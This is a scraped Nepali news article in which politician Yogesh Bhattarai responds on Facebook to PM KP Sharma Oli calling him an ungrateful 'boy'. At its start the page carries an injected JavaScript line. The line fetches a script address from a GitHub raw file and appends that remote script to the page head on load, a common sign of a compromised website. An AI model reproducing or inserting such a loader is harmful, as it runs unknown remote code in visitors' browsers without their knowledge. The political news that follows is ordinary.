;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ ०४,
काठमाडौं । नेपाल कम्युनिष्ट पार्टी (नेकपा) प्रचण्ड नेपाल समूहका स्थायी कमिटी सदस्य योगेश भट्टराईले प्रधानमन्त्री केपी शर्मा ओलीले आफूलाई केटोको संज्ञा दिदा दुःख नगालगेको बताएका छन् ।
ओलीले आफू निकट् नेताहरुको भेलालाई सम्बोधन गर्दै शनिबार भट्टराईले बैगुनी केटाको संज्ञा दिएका थिए । लगत्तै सामाजिक संजालमार्फत् जवाफ दिदै भट्टराईले केटा र केटीहरुको रगत, पसिना र मेहनतको जगमा खडा भएको ब्यबस्था मै ओलीले कुर्सी प्राप्त गरेको स्मरण समते गराएका छन् ।
उनले लेखेका छन्-केटा र केटीहरुको रगत, पसिना र मेहनतको जगमा खडा भएको ब्यबस्था मै यहाँले कुर्सीप्राप्त गर्नुभएको हो ।
केटो भनिपाउदा मलाई दु:ख छैन । तपाईंको स्तर थाहा पाएँ खुशी लाग्यो ।
फेसबुक प्रतिक्रियाहरु